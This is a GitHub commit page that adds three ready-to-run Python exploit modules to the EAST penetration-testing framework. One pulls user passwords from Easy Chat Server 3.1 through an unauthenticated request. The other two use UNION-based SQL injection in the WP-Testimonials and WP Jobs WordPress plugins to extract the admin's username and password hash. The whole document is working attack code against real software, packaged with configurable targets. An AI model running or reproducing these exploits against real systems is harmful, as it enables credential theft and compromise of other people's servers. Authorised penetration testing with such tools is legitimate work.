Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
Borsig authored Jun 23, 2017
1 parent 02ca37c commit 92f418b
Show file tree
Hide file tree
Showing 3 changed files with 317 additions and 0 deletions.
77 changes: 77 additions & 0 deletions exploits/efa_easy_chat_server_pd.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution

import sys
import os
import re
import urllib2

sys.path.append('./core')
from Sploit import Sploit

INFO = {}
INFO['NAME'] = "efa_easy_chat_server_pd"
INFO['DESCRIPTION'] = "Easy Chat Server 3.1 Password Disclosure"
INFO['VENDOR'] = "http://echatserver.com"
INFO['DOWNLOAD_LINK'] = 'http://echatserver.com/ecssetup.exe'
INFO['LINKS'] = ['https://packetstormsecurity.com/files/142884/Easy-Chat-Server-3.1-Password-Disclosure.html']
INFO["CVE Name"] = ""
INFO["NOTES"] = """Registeration page 'register.ghp' allows disclosing ANY user's password. Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password."
"""
INFO['CHANGELOG'] = "15 Jun, 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/Web/'

# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = 80, dict(description = 'Target port')
OPTIONS["USER"] = 'admin', dict(description = 'Username')


class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.port = port
self.host = host
self.user = ''

def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.user = self.args.get('USER', 'admin')

def make_url(self, path = ''):
return 'http://{}:{}{}'.format(self.host, self.port, path)

def run(self):
self.args()
self.log("Attacking {}".format(self.host))

url = self.make_url('/register.ghp?username={}&password='.format(self.user))
try:
fd = urllib2.urlopen(url)
content = fd.read()
except Exception as e:
self.log(e)
self.finish(False)

result = re.findall('<INPUT type="password" name="Password" maxlength="30" value="(.+?)">', content)
if len(result) > 0:
self.log('Password: ' + result[0])
self.finish(True)
else:
self.log('User not Found')
self.finish(False)

if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""

print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()
120 changes: 120 additions & 0 deletions exploits/efa_wordpress_testimonials_sqli.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,120 @@
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution

import sys
import re
import base64
import urllib
import urllib2
import cookielib

sys.path.append("./core")
from Sploit import Sploit

INFO = {}
INFO['NAME'] = "efa_wordpress_testimonials_sqli"
INFO['DESCRIPTION'] = "WP-Testimonials WordPress Plugin v.3.4.1 - Union Based SQL Injection"
INFO['VENDOR'] = "http://www.sunfrogservices.com/web-programmer/wp-testimonials/"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-injection-sqli/']
INFO["CVE Name"] = ""
INFO["NOTES"] = """SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter."""

INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/Web/'

# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = "80", dict(description = 'Target port')
OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
OPTIONS["SSL"] = False, dict(description = 'Use SSL')

class exploit(Sploit):
def __init__(self, host="", port=0, logger=None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.port = port
self.host = host
self.ssl = False
self.basepath = "/"
self.username = ''
self.password = ''

def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.basepath = self.args.get('BASEPATH', self.basepath)
self.username = self.args.get('USERNAME', self.username)
self.password = self.args.get('PASSWORD', self.password)
self.ssl = self.args.get('SSL', self.ssl)

self.cookiesjar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
urllib2.install_opener(opener)

def make_url(self, path = ''):
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)

def prot(self):
return self.ssl and 'https://' or 'http://'

def auth_wordpress(self, username, password):

url = self.make_url('/wp-login.php')
data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)

fd = urllib2.urlopen(url)
init_cookie = fd.headers['Set-Cookie']

request = urllib2.Request(url, data)
request.add_header('Cookie', init_cookie)
fd = urllib2.urlopen(request)

power_cookie = ''
for k in self.cookiesjar:
power_cookie += k.name + '=' + k.value + ';'
return power_cookie


def run(self):
self.args()

cookies = self.auth_wordpress(self.username, self.password)
url = self.make_url('/wp-admin/admin.php?')

sql = 'page=sfstst_manage&mode=sfststedit&testid=' + urllib.quote('-1 UNION ALL SELECT NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users where id=1 -- comment')

self.log('Begin extracting admin\'s credentials')
result = ''
try:
request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
fd = urllib2.urlopen(request)
result = fd.read()
result = result.split('###')[1]
except Exception as e:
self.log(e)
self.log("Failed!")
self.finish(False)

if result:
self.log('Output format username:hash-password')
self.log('=' * 60)
self.log('End with: {}'.format(result))
self.log('=' * 60)
self.finish(True)

self.finish(False)

if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()
120 changes: 120 additions & 0 deletions exploits/efa_wordpress_wp_jobs_sqli.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,120 @@
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution

import sys
import re
import base64
import urllib
import urllib2
import cookielib

sys.path.append("./core")
from Sploit import Sploit

INFO = {}
INFO['NAME'] = "efa_wordpress_wp_jobs_sqli"
INFO['DESCRIPTION'] = "WordPress Plugin WP Jobs < 1.5 - SQL Injection"
INFO['VENDOR'] = "http://www.intensewp.com/"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42172/']
INFO["CVE Name"] = "CVE-2017-9603"
INFO["NOTES"] = """SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php"""

INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/Web/'

# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = "80", dict(description = 'Target port')
OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
OPTIONS["SSL"] = False, dict(description = 'Use SSL')

class exploit(Sploit):
def __init__(self, host="", port=0, logger=None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.port = port
self.host = host
self.ssl = False
self.basepath = "/"
self.username = ''
self.password = ''

def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.basepath = self.args.get('BASEPATH', self.basepath)
self.username = self.args.get('USERNAME', self.username)
self.password = self.args.get('PASSWORD', self.password)
self.ssl = self.args.get('SSL', self.ssl)

self.cookiesjar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
urllib2.install_opener(opener)

def make_url(self, path = ''):
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)

def prot(self):
return self.ssl and 'https://' or 'http://'

def auth_wordpress(self, username, password):

url = self.make_url('/wp-login.php')
data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)

fd = urllib2.urlopen(url)
init_cookie = fd.headers['Set-Cookie']

request = urllib2.Request(url, data)
request.add_header('Cookie', init_cookie)
fd = urllib2.urlopen(request)

power_cookie = ''
for k in self.cookiesjar:
power_cookie += k.name + '=' + k.value + ';'
return power_cookie


def run(self):
self.args()

cookies = self.auth_wordpress(self.username, self.password)
url = self.make_url('/wp-admin/edit.php?')

sql = 'post_type=job&page=WPJobsJobApps&jobid=' + urllib.quote('5 UNION ALL SELECT NULL,NULL,NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL FROM wp_users where id=1 -- comment')

self.log('Begin extracting admin\'s credentials')
result = ''
try:
request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
fd = urllib2.urlopen(request)
result = fd.read()
result = result.split('###')[1]
except Exception as e:
self.log(e)
self.log("Failed!")
self.finish(False)

if result:
self.log('Output format username:hash-password')
self.log('=' * 60)
self.log('End with: {}'.format(result))
self.log('=' * 60)
self.finish(True)

self.finish(False)

if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()

0 comments on commit 92f418b

Please sign in to comment.